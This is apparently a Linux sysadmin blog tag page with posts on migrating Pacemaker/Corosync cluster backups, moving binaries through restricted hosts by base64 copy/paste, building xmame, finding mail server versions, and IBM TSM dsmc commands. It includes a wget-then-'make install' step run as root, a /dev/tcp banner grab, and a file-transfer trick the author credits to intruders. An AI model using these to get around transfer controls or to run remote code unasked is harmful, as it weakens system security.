Posts Tagged ‘tar’

How to create PCS / Corosync High Availability Cluster config backup and migrate to new Virtual Machines

Thursday, October 26th, 2023

pcs-pcmk-internals-explained-picture

The aim of this article is to illustrate how to migrate HAProxy PCS Pacemaker / Corosync Cluster configuration from old Virtual Machines that, due to the time passed, have become unsupported (the Operating System has reached its End Of Life (EOL)) to new ones.
This is quite a complex task, especially as you usually need to set up the Hypervisor hosts with VMWare / Xen / KVM / OpenVZ or whatever kind of virtualization is to be used. Then you need to set up the correct network interface IPs, the failover heartbeat lines over which the cluster will work to prevent Split Brain scenarios, and the Network Bonding interfaces to guarantee higher availability, as well as physically install and update all the cluster software on the newly built Linux hosts that will be members of the new cluster.

All this configuration from scratch of a PCS Corosync cluster is a very lengthy topic which I'll try to cover in some of my next articles. In short, to migrate the cluster from the old machines to new ones, once all the pre-described steps are in place, you will need to:


1. Create backup of old cluster configuration
2. Migrate the backup to a new built VM Machine hosts
3. Import the cluster configuration into the PCS Cluster.


Bear in mind that this article discusses a migration of CentOS Linux release 7.9.2009 with its shipped versions of corosync / pacemaker and pcs 

How to create cluster config backup and migrate to new VM

1. Dump the cluster config, assuming that this is a Quality Assurance or Pre-Production host, to create a full cluster config backup

[root@old-cluster-machine ~]# pcs config backup old-cluster-machine.pcs.config.bak

2. Dump the Production cluster full configuration

[root@old-cluster-machine1 ~]# pcs config backup old-cluster-machine1.pcs.config.bak

This command will produce the backup file:

old-cluster-machine1.pcs.config.bak.tar.bz2
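Before moving it anywhere, you can sanity-check the produced tarball by listing its contents with tar (a quick optional check; you should see the same file list as in the restore step further below):

[root@old-cluster-machine1 ~]# tar -tjf old-cluster-machine1.pcs.config.bak.tar.bz2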

3. Migrate the identical cluster config to the new Virtual machines

Usually the transfer of backup files produced with the pcs config backup command can be done with something like FTP / SFTP or an SSL-ed / TLS-ed protocol. However, you might have to move the configuration files out of a paranoid Citrix environment that doesn't allow any SFTP / SSH or FTP kind of transfer protocol from the location where the old config lives to the new one.
In that case a simple encoding of the binary dumped configuration to a plain text file can be done, and the files can then be moved via a simple copy / paste operation (a bit of a hack) 🙂

Encode the cluster config so the configuration can be migrated as plain text via a simple Copy / Paste operation:

 

[root@old-cluster-machine ~]# base64 old-cluster-machine.pcs.config.bak.tar.bz2 > old-cluster-machine.pcs.config.bak.tgz.b64

[root@old-cluster-machine1 ~]# base64 old-cluster-machine1.pcs.config.bak.tar.bz2 > old-cluster-machine1.pcs.config.bak.tgz.b64
[root@old-cluster-machine ~]# cat  old-cluster-machine.pcs.config.bak.tgz.b64

(Copy the output and Paste it on the new host VM under /root/haproxy-cluster-backup)

[root@old-cluster-machine1 ~]# cat old-cluster-machine1.pcs.config.bak.tgz.b64 


(Copy the output and Paste it on the new host VM under /root/haproxy-cluster-backup)

Log in to the new hosts where the configs have to be migrated, and restore the files with base64.

For QA / Preprod to restore backup config

[root@dkv-newqa-vm ~]# mkdir /root/haproxy-cluster-backup
[root@dkv-newqa-vm ~]# cd /root/haproxy-cluster-backup
[root@dkv-newqa-vm ~]# base64 -d old-cluster-machine.pcs.config.bak.tgz.b64 > old-cluster-machine.pcs.config.bak.tar.bz2
[root@dkv-newqa-vm ~]#  tar -jxvf old-cluster-machine.pcs.config.bak.tar.bz2
version.txt
pcs_settings.conf
corosync.conf
cib.xml
pacemaker_authkey
uidgid.d/

 

For Prod to restore backup config

[root@dkv-newprod-vm  ~]# mkdir /root/haproxy-cluster-backup
[root@dkv-newprod-vm ~]# cd /root/haproxy-cluster-backup
[root@dkv-newprod-vm ~]# base64 -d old-cluster-machine1.pcs.config.bak.tgz.b64 > old-cluster-machine1.pcs.config.bak.tar.bz2
[root@dkv-newprod-vm ~]# tar -jxvf old-cluster-machine1.pcs.config.bak.tar.bz2
version.txt
pcs_settings.conf
corosync.conf
cib.xml
pacemaker_authkey
uidgid.d/
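With the tarball restored on the new node, the actual import (step 3 from the list in the beginning) can be done with the pcs config restore command, which reads such a backup tarball; a sketch with the file names used above, to be run only once the new cluster software is installed and you are ready to overwrite its configuration:

[root@dkv-newprod-vm ~]# pcs config restore /root/haproxy-cluster-backup/old-cluster-machine1.pcs.config.bak.tar.bz2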


N.B.! A useful hint: RHEL 8 Linux's shipped pcs command version also has a very handy option with which you can simply dump the whole cluster config as plain commands, which you can run directly on the new VM machines you have migrated to.

The command to print out commands that would add existing cluster resources on Redhat 8:

# pcs resource config --output-format=cmd

Another useful command for cluster migration is cibadmin

i.e. to dump cluster xml config

# cibadmin --query > cluster.xml

Later you can import the prior xml dump with it.

# cibadmin --replace --xml-file cib.xml
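To sanity-check the cluster configuration after such a replace, pacemaker's crm_verify tool can validate the live CIB (a quick optional check):

# crm_verify -L -V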

 

How to move / transfer binary files encoded with base64 on Linux with Copy / Paste of a text ASCII encoded string

Monday, October 25th, 2021

base64-encode-decode-binary-files-to-transfer-between-servers-base64-artistic-logo

If you have to work on servers in protected environments that are accessed via multiple VPNs, Jump hosts or Web Citrix, and you have no means to copy binary files to or from your computer because all kinds of FTP / SFTP or whatever data copy clients are disabled on the remote jump host side or CITRIX server, you may still be looking for a way to copy files between your PC and the remote server side.
Similarly, you may have 2 or more servers in special Demilitarized Network Zones ( DMZ ) where the machines don't run SFTP / FTP / a WebServer or any other copy protocol service that could be used to move files between the hosts, and you still need to copy some files between the 2 or more machines in a slow but still functional way. If so, you might not know one old school hackers' trick you can employ to complete the copy of files between DMZ-ed Server Host A, let's say with IP address (192.168.50.5) -> Server Host B (192.168.30.7). The way to complete the binary file copy is to encode the binary on Server Host A, use the cat command to display the encoded string, and copy the whole encoded cat command output to your local PC buffer (from where you access the remote side via SSH via the CITRIX or Jump host). Then paste it on the other side and decode it with an encoding tool such as base64 or uuencode. In this article, I'll show how this is done with base64 and uuencode. The base64 binary is pretty standard on most Linux / Unix OS-es today; on most Linux distributions it is part of the coreutils package.
The main use of base64 encoding is to encode non-text attachment files for Electronic Mail, but for our case it fits perfectly.
Keep in mind that this hack to copy the binary from Machine A to Machine B of course depends on the Copy / Paste buffer being enabled both on the remote Jump host or Citrix from where you reach the servers, as well as on your own PC laptop from where you access the remote side.

base64-character-encoding-string-table

Base64 Encoding and Decoding text strings legend

The file copy process to the highly secured PCI host goes like this:
 

1. On Server Host A take a checksum of the file with the md5sum command

[root@serverA ~]:# md5sum -b /tmp/inputbinfile-to-encode
66c4d7b03ed6df9df5305ae535e40b7d *inputbinfile-to-encode

 

As you can see, one good location to keep the encoded file would be /tmp as this is a temporary home, or you can alternatively use your HOME dir, but be careful not to run out of space wherever you produce it 🙂

 

2. Encode the binary file with base64 encoding

[root@serverA ~]:# base64 -w0 /tmp/inputbinfile-to-encode > /tmp/outputbin-file.base64

The -w0 option is given to disable line wrapping, which is not really needed if you are going to copy / paste the data.

base64-encoded-binary-file-text-string-linux-screenshot

Base64 Encoded string chunk with line wrapping

For a complete list of possible accepted arguments check here.

3. Cat the outputbin-file.base64 just generated to display the text encoded file in your SecureCRT / Putty / SuperPutty etc. remote ssh access client

[root@serverA ~]:# cat /tmp/outputbin-file.base64
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAMGEAAAAAAABAAAAAAAAAACgXAgAAAAAAAAAAA
EAAOAALAEAAHQAcAAYAAAAEAAA ……………………………………………………………… cTD6lC+ViQfUCPn9bs

 

4. Select the cat-ted string and copy it to your PC Copy / Paste buffer


If the bin file is not a few kilobytes but a few megabytes, copying the file might be tricky, as the string produced by the cat command will be really long, so make sure the SSH client you're using is configured with a large enough scroll buffer to be able to select the whole encoded string from beginning to end of the cat output and copy it to the Copy / Paste buffer.
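If selecting one giant string is too error prone, a workaround sketch (chunk size and file names here are just examples) is to split the encoded file into fixed-size pieces on Server Host A, copy / paste them one by one, and concatenate them back on Server Host B:

[root@serverA ~]:# split -b 100k -d /tmp/outputbin-file.base64 b64chunk.
(copy / paste each b64chunk.00, b64chunk.01 … into same-named files on Server Host B)
[root@serverB ~]:# cat b64chunk.* > outputbin-file.base64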

 

5. On Server Host B paste the base64 encoded binary inside a newly created file

Open with a text editor vim / mc or whatever is available

[root@serverB ~]:# vi outputbin-file.base64

Some very paranoid Linux / UNIX systems might not even have a normal text editor like 'vi'; if you happen to need to copy files on such one, a useful thing is to use a simple cat on the remote side to open a new file descriptor buffer, like this:

[root@serverB ~]:# cat >> outputbin-file.base64 <<'EOF'
(Paste the string here, then type EOF on its own line to close the file)
EOF

 

6. Decode the encoded binary with base64 cmd again

[root@serverB ~]:# base64 --decode outputbin-file.base64 > inputbinfile-to-encode

 

7. Set proper file permissions (the same as on Host A)

[root@serverB ~]:#  chmod +x inputbinfile-to-encode

 

8. Check again the binary file checksum on Host B is identical as on Host A

[root@serverB ~]:# md5sum -b inputbinfile-to-encode
66c4d7b03ed6df9df5305ae535e40b7d *inputbinfile-to-encode

As you can see, the md5sums match on both sides, so the file should be OK.

 

9. Encoding and decoding files with uuencode


If you are lucky and you have uuencode installed (the sharutils package) on the remote machine, to encode let's say an archived set of binary files in .tar.gz format do:

Prepare the archive of all the files you want to copy with tar on Host A:

[root@Machine1 ~]:# tar -czvf archived-binaries-and-configs.tar.gz /bin/whatever /usr/local/bin/htop /usr/local/bin/samhain /etc/hosts

[root@Machine1 ~]:# uuencode archived-binaries-and-configs.tar.gz archived-binaries-and-configs.tar.gz > archived-binaries-and-configs.uu

Cat / Copy / paste the encoded content as usual to a file on Host B:

Then on Machine 2 decode:

[root@Machine2 ~]:# uudecode archived-binaries-and-configs.uu

 

Conclusion


In this short article I've shown you a hack that is often used by script kiddies to copy files between pwn3d machines, a method which however is very precious and useful for sysadmins like me who have to administer paranoidly secured servers placed in very hard to access environments.

With the same method you can encode or decode not only binary files but also any standard input / output file content. base64 encoding is also quite useful in bash or perl scripts where you want the script to copy a file in a plain text format. Data is encoded and decoded to make the transmission and storing process easier. Always keep in mind that encoding and decoding are not similar to encryption and decryption, as encryption / decryption adds a security layer to the encoded data. Encoded data can be easily revealed by decoding, so if you need to copy very sensitive data between the servers, like SSL certificates or Private RSA / DSA keys, this command line utility had better not be used for the copying.

 

 

How to Install and Play old Arcade Multiple Arcade Machine Emulator Games on Linux in 2021 with xmame and GXMame GUI Frontend

Friday, May 14th, 2021

mame-multiple-arcade-machine-emulator
I've earlier blogged on how to install and play old arcade games with xmame compiled from source on the now old Debian 7 Linux in the article Install xmame from source on Debian Linux 7.0 (Wheezy) to play for better MAME (Arcade Games Emulation),
as well as on using the newer version of the MAME emulator instead of xmame in the article Playing Arcade old school games on Debian Linux; on how to make the MAME emulator work with a joystick see my previous How to configure Joystick ( Gamepad ) on Debian, Ubuntu, Mint GNU / Linux easily.

Since I have preinstalled my notebook with a fresh Debian 10 Buster, for a long time I did not have the time or desire to play my favourite games of my youth, to name a few: Xain'd Sleena / Cadillacs and Dinosaurs (1993) / The Punisher (1993) / Captain Commando (1991) / Super Mario / Contra / Final Fight etc., and the rest of the SEGA Mega Drive / GameBoy / Nintendo / Terminator game (fake clone of Nintendo) and other killer Arcade Classics of the late 90s and early 2000s, which we played in public houses on game cabinets with joysticks.
Hence I tried to reproduce some of my articles as of 2021 to see whether we can still get a nice playable MAME emulator on Linux with a graphical GUI for MATE or GNOME. It turned out a straight mame out of the Debian standard repositories did not work with some of the more sophisticated ROM .zip files, such as the Punisher or XSLEENA.zip, and this is how this article got born, in an attempt to give a way for such old school game freaks as me to be able to play their favorite games of their youth.

Below are a few steps adapted mostly from the above articles, with some head banging and multiple lost hours of wondering, until I finally got a working XMAME ROM emulator with the simple but working GXMAME graphical frontend for M.A.M.E.

To compile xmame with joystick support, be it analog or whatever joystick you have, use a Makefile like the one below:

https://www.pc-freak.net/files/xmame-0.103-Makefile-for-joystick

Copy it to your PC and rename it to Makefile in the xmame-0.103 source dir:

# cd /usr/local/src/xmame-0.103


I had to install all the necessary package dependencies (development header files), some of which are mentioned in the beginning of the referenced articles and some of which I had to install manually, such as the preset Debian meta-package build-essential (see Things to install on newly installed GNU / Linux (My favourite must have Linux text and GUI programs missing in fresh Linux installs)); just to mention a few I remember installing based on some compilation errors:

# apt-get install build-essential
# apt-get install --yes zlib1g-dev
# apt-get install --yes libexpat1-dev
# apt-get install --yes libghc-x11-dev
# apt-get install --yes x11proto-video-dev
# apt-get install --yes libxv-dev
# apt-get install libxext6
# apt-get install libxext6-dev
# apt-get install libxext-dev
# apt-get install libjpeg62-turbo-dev
# apt-get install libxinerama-dev
# apt-get install libgtk-3-dev
# apt-get install syslog-ng-dev
# apt-get install libgtk2.0-dev


If I'm missing some necessary package here, you will have to find it yourself based on the *.h file reported in the error during compile; you should look it up with a cmd like:

# apt-file search glib2.h


And install it further.

You will need to edit the Makefile, or take and straight use, or if necessary adapt, the already prepared Makefile for this purpose:
 

# wget https://www.pc-freak.net/files/xmame-0.103-Makefile-for-joystick
# mv xmame-0.103-Makefile-for-joystick Makefile
# make && make install


Some .zip ROMs do not work properly with the newer mame; you need to use xmame instead.

Below is the version I use on Debian 10 as of May 2021 year.

hipo@jeremiah:/usr/local/src$ xmame --version
GLINFO: loaded OpenGL library libGL.so!
GLINFO: loaded GLU    library libGLU.so!
xmame (x11) version 0.103 (May 13 2021)


To make the joystick work in xmame you will need to have a preset of modules loaded on the Linux; for my old Genius joystick this is what works:

hipo@jeremiah:~/Games$ cat /etc/modules
# /etc/modules: kernel modules to load at boot time.
#
# This file contains the names of kernel modules that should be loaded
# at boot time, one per line. Lines beginning with "#" are ignored.
snd-seq
3c59x
snd-emu10k1
snd-pcm-oss
snd-mixer-oss
snd-seq-oss
joydev
ns558
sidewinder
gameport
analog
adi
pcigame
iforce
evdev
usbhid


Fill in your joystick module there and make sure you manually load each one of the modules with the modprobe command, as in the sketch below.
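A minimal sketch to load the whole list at once (module names taken from my list above; substitute the ones your joystick needs):

# for mod in joydev ns558 sidewinder gameport analog adi pcigame iforce evdev usbhid; do modprobe $mod; done
# lsmod | grep -E 'joydev|gameport'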
Next calibrate the joystick with some tool like jstest-gtk.

jktest-gtk-linux-screenshot
If you need a good frontend for MATE / GNOME for xmame, try gxmame. It is a real pain in the ass to configure, so below I link the only working combination I found: an xmame version with a good configuration, as well as gxmame with a prebuilt game list.
If you need the exact xmame version I'm using, xmame-0.103.tar.bz2, the archive is at:

https://www.pc-freak.net/files/xmame-0.103.tar.bz2
An old bundle of both gxmame and xmamerc configs is here

https://www.pc-freak.net/files/xmame.tar.gz

https://www.pc-freak.net/files/xmame-config-for-joystick-hipo.tar.gz
For example my old working version of xmame ~/.xmame is here https://www.pc-freak.net/files/xmame-config-for-joystick-hipo.tar.gz

The configuration of gxmame (even though it has a GUI for configuring) is below:

https://www.pc-freak.net/files/gxmame.tar.gz

xmamerc sample working file is here

https://www.pc-freak.net/files/xmamerc

My newest current version as of Debian 10 Buster of xmame and gxmame is below:

https://www.pc-freak.net/files/gxmame-config-newest_may_2021.tar.gz

https://www.pc-freak.net/files/xmame-config-newest_may_2021.tar.gz

Note that my ROM files and stuff are located and configured in the newest configs to live under /home/hipo/Games/roms/; if your location differs, grep for it in the .xmame/* and .gxmame/* files and set the correct PATH locations.

A VERY IMPORTANT NOTE is not to use the stable version of GXMAME: even though it worked fine back in 2003, the project is abandoned and unsupported as of 2021, and the latest downloadable stable gxmame file on the Sourceforge gxmame-0.34b website is not working correctly (even though it compiles fine).
You have to compile and use the newer version gxmame-0.35beta1 instead.

If you want to use gxmame with a joystick you need to compile it with the respective option:
 

root@jeremiah:/usr/local/src/gxmame-0.35beta1# ./configure --enable-joystick

 

gxmame 0.35beta1

Print debugging messages…… : no
Joystick support………….. : yes

GXMame will be installed in /usr/local/bin.
Warning: You have an old copy of gxmame at /usr/local/bin/gxmame.

 

configure complete, now type 'make'

To install compiled binaries do the usual:
 

# make && make install

The gxmame binary should be installed under /usr/local/bin/gxmame; once launched you should get the shiny gxmame GUI.

gxmame-screenshot-debian-10-gnu-linux-mate-desktop

Perhaps there was other stuff I did in the process that I forgot to document here, so if you try to follow my guide and something does not work, please tell me what I'm missing, and if you can't handle it either, contact me.

The guide is for Debian Linux but should work on other .Deb based Linux distros such as Ubuntu / Linux Mint etc.

To enjoy my 4GB present of ROM files containing many of the best well known M.A.M.E. ARCADE GAMES, check the archive here. Note that this collection was downloaded from the Internet and I do not hold any responsibility for the archive. If it contains files with any copyright infringement, using it is at your own risk.
 

How to check version of most used mail servers Postfix / Qmail / Exim / Sendmail

Wednesday, October 14th, 2020

How to check version of a Linux host's installed Mail server?

The most used mail servers are Postfix / Qmail / Exim / Sendmail, and usually you have to do a dpkg -l / rpm -qa or whatever the package manager offers to get the package version. But sometimes the package is built with a different naming convention from the actual installed MTA.

As recently I had to check on a Linux host what version of the SMTP server was installed and in use, below is how to find the concrete versions of Postfix / Qmail / Exim / Sendmail.
If none of the 4 is installed and something more cryptic like ssmtp is installed instead, perhaps the best way would be to check with the lsof -i :25 command and see what process has bound to and listens on TCP port 25, as the sketch below shows.
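For example (a sketch; the output will differ per system, but the COMMAND column betrays the MTA, e.g. master for postfix, exim4 for exim, sendmail, or qmail's tcpserver / qmail-smtpd):

root@server :~# lsof -i :25 | grep -i listen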

mail-server-lsof-linux-screenshot-qmail-vpopmail

 

 

1. How to check Postfix exact mail server version

mail-server-exim-check-lsof-screenshot

Once you find Postfix is the network listening MTA, you might think you can simply use postfix -v, but no …
Unlike many other applications, Postfix has no -v or --version switch. But you can get the version information easily by using the postconf command as shown below:

root@server :~# postconf mail_version

postfix-show-version-postconf-linux

Another approach is to dump all postfix configuration settings (this is useful to get more info on how postfix is configured) and explicitly grep for the version:

root@server :~# postconf -d | grep mail_version

 

2. How to check Exim MTA running version ?

root@exim-mail :/ # exim -bV
Exim version 4.72 #1 built 13-Jul-2010 21:54:55
Copyright (c) University of Cambridge, 1995 – 2007
Berkeley DB: Sleepycat Software: Berkeley DB 4.3.29: (September 19, 2009)
Support for: crypteq iconv() Perl OpenSSL move_frozen_messages Content_Scanning DKIM Old_Demime
Lookups: lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmnz
Authenticators: cram_md5 plaintext spa
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore/mbx autoreply lmtp pipe smtp
Size of off_t: 8
OpenSSL compile-time version: OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
OpenSSL runtime version: OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
Configuration file is /etc/exim.conf

how-to-get-exim-version-on-gnu-linux-screenshot


3. How to check Sendmail Mail Transport Agent exact Mail version ?

Though sendmail is rarely used these days and it usually runs mostly on obsolete old scrap hosts
or in some old fashioned conservative organizations such as Banks and Payment services providers, you might still need to inventory it. Just like the m4 configuration format's complexity with its annoying macros, getting the version is also not straightforward:

# sendmail -d0.4 -bv root | grep Version
Version 8.14.4

Above commands should be working on most Linux distributions such as Debian / Ubuntu / Fedora / CentOS / SuSE and other Linux derivatives
 

4. How to check Qmail MTA version?

This is a bit of a complicated question, as Qmail's base has not been significantly changed for years.
The latest published qmail package is qmail-1.03.tar.gz; 1.03 was released in 1998. Qmail is famous for its unbreakable security. The author of qmail, Daniel J. Bernstein, wrote Qmail to make the installation and configuration of SMTP simple; at the time of writing it, sendmail was the de facto standard and sendmail was hard to configure.
Also sendmail was famous for a set of security holes through which a lot of Sendmail MTAs on the Net got hacked. Thus QMAIL was written as a more security-aware mail transport agent.

In contrast to sendmail, qmail has a modular architecture composed of mutually untrusting components; for instance, the SMTP listener component of qmail runs with different credentials from the queue manager or the SMTP sender. qmail was also implemented with a security-aware replacement to the C standard library, and as a result has not been vulnerable to stack and heap overflows, format string attacks, or temporary file race conditions.

The core qmail package has not been updated for many years. New features were initially provided by third party patches, from which the most important at the time were brought together in a single meta-patch set called netqmail.

The current version of netqmail is 1.06, netqmail-1.06.tar.gz, as of year 2020.

One possible way to get some info about an installed qmail or its components is to use the documentation lookup command apropos:

qmail:~# apropos qmail


or check the manual, or at worst check the installation source files that the person who installed the qmail used 🙂

A fun fact about qmail few might know: D. Bernstein offered in 1997 a US$500 reward for the first person to publish a verifiable security hole in the latest version of the software. For many years, till 2005, no hole was found, when security researcher Georgi Guninski found an integer overflow in qmail. On 64-bit platforms, in default configurations with sufficient virtual memory, the delivery of huge amounts of data to certain qmail components may allow remote code execution. Bernstein disputes that this is a practical attack, arguing that no real-world deployment of qmail would be susceptible. Configuration of resource limits for qmail components mitigates the vulnerability.

On November 1, 2007, Bernstein raised the reward to US$1000. At a slide presentation the following day, Bernstein stated that there were 4 "known bugs" in the ten-year-old qmail-1.03, none of which were "security holes." He characterized the bug found by Guninski as a "potential overflow of an unchecked counter." "Fortunately, counter growth was limited by memory and thus by configuration, but this was pure luck."

5. Quick way to check the type of Mail server installed on Debian based Linux that doesn't have telnet installed


As you know, a simple telnet localhost 25 or a simple ps -ef could most of the time reveal general information on the installed server. However there is another way to do it using the package manager, by using the bash shell built-in type command like so:
 

# type -p sendmail | xargs dpkg -S

type-x-bash-command-to-find-out-email-server-version-on-linux

Another hacky way to check whether exim, postfix or sendmail SMTP is installed is with:

hipo@freak:~$ echo $(man sendmail)| grep "exim"|wc -l
1
hipo@freak:~$ echo $(man sendmail)| grep "postfix"|wc -l
0
hipo@freak:~$ echo $(man sendmail)| grep "sendmail"|wc -l
0
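Yet another telnet-less trick, assuming your login shell is bash: its built-in /dev/tcp pseudo-device can fetch the SMTP greeting banner, with which most MTAs announce themselves (a sketch; some hardened bash builds have /dev/tcp support compiled out):

hipo@freak:~$ exec 3<>/dev/tcp/localhost/25; read -r banner <&3; echo "$banner"; exec 3<&-

A greeting like '220 hostname ESMTP Postfix' immediately gives the MTA away.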

I guess there are nice hacks and ways to get versions, so if you're aware of any please share with me.
Enjoy !

IBM TSM dsmc console client use for listing configured backups, checking set scheduled backups and backup and restore operations howto

Friday, March 6th, 2020

tsm-ibm-logo_tivoli-dsmc-console-client-listing-backups-create-backups-and-restore-on-linux-unix-windows

Creating a simple home based backup solution with some shell scripting and rsync is common. However, as a sysadmin in middle sized or large corporations you will see that most companies use some professional backup service such as IBM Tivoli Storage Manager (TSM); recently IBM changed the name of the product to IBM Spectrum.

IBM TSM is a data protection platform that gives enterprises a single point of control and administration for backup and recovery; it is used for Private Cloud backups and other high end solutions where data criticality is paramount.
Usually in large companies TSM backup handling is managed by a separate team or teams, as managing a large TSM infrastructure is quite a complex task. However my experience as a sysadmin shows me that even if you don't have too much in-depth knowledge of tsm, it is very useful to know how to manage at least basic incremental backup operations, such as viewing what is set to be backed up, setting up a new directory structure for backup, checking the configured backup schedule, checking which files are included in and which excluded from the backup store etc.

TSM has multi OS support and you can use it on most mainstream Operating Systems: Windows / Mac OS X and Linux. In this specific article I'll be talking concretely about backing up data with tsm on Linux; Tivoli can theoretically be brought up even on FreeBSD machines via the Linuxemu BSD module and the 64-Bit Tivoli Storage Manager RPMs.
Therefore in this small article I'll try to give a few useful operations for the novice admin that stumbles on a tsm backed-up server that needs some small maintenance.
 

1. Starting up the dsmc command line client

 

No matter the operating system, to start the client run:

# dsmc

 

tsm-check-backup-schedule-set-time

Note that usually dsmc should run as superuser, so if you try to run it as a normal non-root user you will get an error message like:

 

[ user@linux ~]$ dsmc
ANS1398E Initialization functions cannot open one of the Tivoli Storage Manager logs or a related file: /var/tsm/dsmerror.log. errno = 13, Permission denied

 

Tivoli SM has an extensive help, so to get the usage basics, type help:
 

tsm> help
1.0 New for IBM Tivoli Storage Manager Version 6.4
2.0 Using commands
  2.1 Start and end a client command session
    2.1.1 Process commands in batch mode
    2.1.2 Process commands in interactive mode
  2.2 Enter client command names, options, and parameters
    2.2.1 Command name
    2.2.2 Options
    2.2.3 Parameters
    2.2.4 File specification syntax
  2.3 Wildcard characters
  2.4 Client commands reference
  2.5 Archive
  2.6 Archive FastBack

Enter 'q' to exit help, 't' to display the table of contents,
press enter or 'd' to scroll down, 'u' to scroll up or
enter a help topic section number, message number, option name,
command name, or command and subcommand:    

 

2. Listing files listed for backups

 

A note to make here is that, as in most corporate products, tsm supports command aliases, so any command described in the help, like query, can be
abbreviated with its first letters only, e.g. the query filespace tsm cmd can be abbreviated as
tsm> q fi

Commands can also be run in non-interactive mode, so if you want the output of q fi you can invoke it straight from the shell:

# dsmc q fi

 

tsm-check-included-excluded-files-q-file-if-backupped-list-backup-set-directories

This shows the directories and files that are set for backup creation with Tivoli.

 

3. Getting included and excluded backup set files

 

It is useful to know what the exact excluded files from the tsm backup set are; this is done with query inclexcl:

tsm-check-excluded-included-files

 

4. Querying for backup schedule time

Tivoli, as every other backup solution, creates its set of backed up files in certain time slot periods.
To find out what the time slot for backup creation is, use:

tsm> q sched
Schedule Name: WEEKLY_ITSERV
      Description: ITSERV weekly incremental backup
   Schedule Style: Classic
           Action: Incremental
          Options: 
          Objects: 
         Priority: 5
   Next Execution: 180 Hours and 35 Minutes
         Duration: 15 Minutes
           Period: 1 Week  
      Day of Week: Wednesday
            Month:
     Day of Month:
    Week of Month:
           Expire: Never  

 

tsm-query-partitions-backupeed-or-not

 

5. Check which files have been backed up

If you want to make sure backups are really created, it is good to check which files from the selected backup files already have
a working backup copy.

This is done with query backup like so:

tsm> q ba /home/*

 

tsm-dsmc-query-user-home-for-backups

If you want to query all the current files and directories backed up under a directory and all its subdirectories you need to add the -subdir=yes option as below:

 

tsm> q ba /home/hipo/projects/* -subdir=yes
   
Size      Backup Date        Mgmt Class A/I File
   ----      -----------        ---------- --- ----
    512  12-09-2011 19:57:09    STANDARD    A  /home/hipo/projects/hfs0106
  1,024  08-12-2011 02:46:53    STANDARD    A  /home/hipo/projects/hsm41perf
    512  12-09-2011 19:57:09    STANDARD    A  /home/hipo/projects/hsm41test
    512  24-04-2012 00:22:56    STANDARD    A  /home/hipo/projects/hsm42upg
  1,024  12-09-2011 19:57:09    STANDARD    A  /home/hipo/projects/hfs0106/test
  1,024  12-09-2011 19:57:09    STANDARD    A  /home/hipo/projects/hfs0106/test/test2
 12,048  04-12-2011 02:01:29    STANDARD    A  /home/hipo/projects/hsm41perf/tables
 50,326  30-04-2012 01:35:26    STANDARD    A  /home/hipo/projects/hsm42upg/PMR70023
 50,326  27-04-2012 00:28:15    STANDARD    A  /home/hipo/projects/hsm42upg/PMR70099
 11,013  24-04-2012 00:22:56    STANDARD    A  /home/hipo/projects/hsm42upg/md5check  

 

6. Running incremental / selective backups on data

  • To make tsm backup some directories on Linux / AIX and other unices:

 

tsm> incr /  /usr  /usr/local  /home /lib

 

  • For tsm to backup some standard netware drives, use:

 

tsm> incr NDS:  USR:  SYS:  APPS:  

 

  • To backup C:\ D:\ E:\ F:\ if TSM is running on Windows

 

tsm> incr C:  D:  E: F:  -incrbydate 

 

  • To back up entire disk volumes irrespective of whether files have changed since the last backup, use the selective command with a wildcard and -subdir=yes as below:

 

tsm> sel /*  /usr/*   /home/*  -su=yes   ** Unix/Linux

 

7. Backup selected files from a backup location

 

It is intuitive to think you can just add some wildcard characters to select what you want
to backup from a selected location, but this is not so; if you try something like below
you will get an error:

 

tsm> incr /home/hipo/projects/*/* -su=yes      
ANS1071E Invalid domain name entered: '/home/hipo/projects/*/*'


The proper way to select a certain folder / file for backup is with the selective (sel) command:

 

tsm> sel /home/hipo/projects/*/* -su=yes

 

8. Restoring tsm data from backup

 

To restore the config httpd.conf to custom directory use:

 

tsm> rest /etc/httpd/conf/httpd.conf  /home/hipo/restore/

 

N.B.! In order for the above to work you need to have the '/' trailing slash at the end.

If you want to restore a file under a different name:

 

tsm> rest /etc/ntpd.conf  /home/hipo/restore/

 

9. Restoring a whole backed up partition

 

tsm> rest /home/*  /tmp/restore/ -su=yes

 

This uses the Tivoli 'Restoring multiple files and directories' mode, and the files to restore '*'
are kept until the last one is recovered (saying this in case you accidentally cancel the restore).

 

10. Restoring files with back date 

 

By default the restore function will restore the latest available backed up file; if you need
to recover a specific file version, you need the '-inactive' and '-pick' options.
The 'pick' interface is interactive, so once listed you can select the exact file from the date
you want to restore.

General restore command syntax is:
 

tsm> restore [source-file] [destination-file]

 


tsm> rest /home/hipo/projects/*  /tmp/restore/ -su=yes  -inactive -pick

TSM Scrollable PICK Window – Restore

     #    Backup Date/Time        File Size A/I  File
   ————————————————————————————————–
   170. | 12-09-2011 19:57:09        650  B  A   /home/hipo/projects/hsm41test/inclexcl.test
   171. | 12-09-2011 19:57:09       2.74 KB  A   /home/hipo/projects/hsm41test/inittab.ORIG
   172. | 12-09-2011 19:57:09       2.74 KB  A   /home/hipo/projects/hsm41test/inittab.TEST
   173. | 12-09-2011 19:57:09       1.13 KB  A   /home/hipo/projects/hsm41test/md5.out
   174. | 30-04-2012 01:35:26        512  B  A   /home/hipo/projects/hsm42125upg/PMR70023
   175. | 26-04-2012 01:02:08        512  B  I   /home/hipo/projects/hsm42125upg/PMR70023
   176. | 27-04-2012 00:28:15        512  B  A   /home/hipo/projects/hsm42125upg/PMR70099
   177. | 24-04-2012 19:17:34        512  B  I   /home/hipo/projects/hsm42125upg/PMR70099
   178. | 24-04-2012 00:22:56       1.35 KB  A   /home/hipo/projects/hsm42125upg/dsm.opt
   179. | 24-04-2012 00:22:56       4.17 KB  A   /home/hipo/projects/hsm42125upg/dsm.sys
   180. | 24-04-2012 00:22:56       1.13 KB  A   /home/hipo/projects/hsm42125upg/dsmmigfstab
   181. | 24-04-2012 00:22:56       7.30 KB  A   /home/hipo/projects/hsm42125upg/filesystems
   182. | 24-04-2012 00:22:56       1.25 KB  A   /home/hipo/projects/hsm42125upg/inclexcl
   183. | 24-04-2012 00:22:56        198  B  A   /home/hipo/projects/hsm42125upg/inclexcl.dce
   184. | 24-04-2012 00:22:56        291  B  A   /home/hipo/projects/hsm42125upg/inclexcl.ox_sys
   185. | 24-04-2012 00:22:56        650  B  A   /home/hipo/projects/hsm42125upg/inclexcl.test
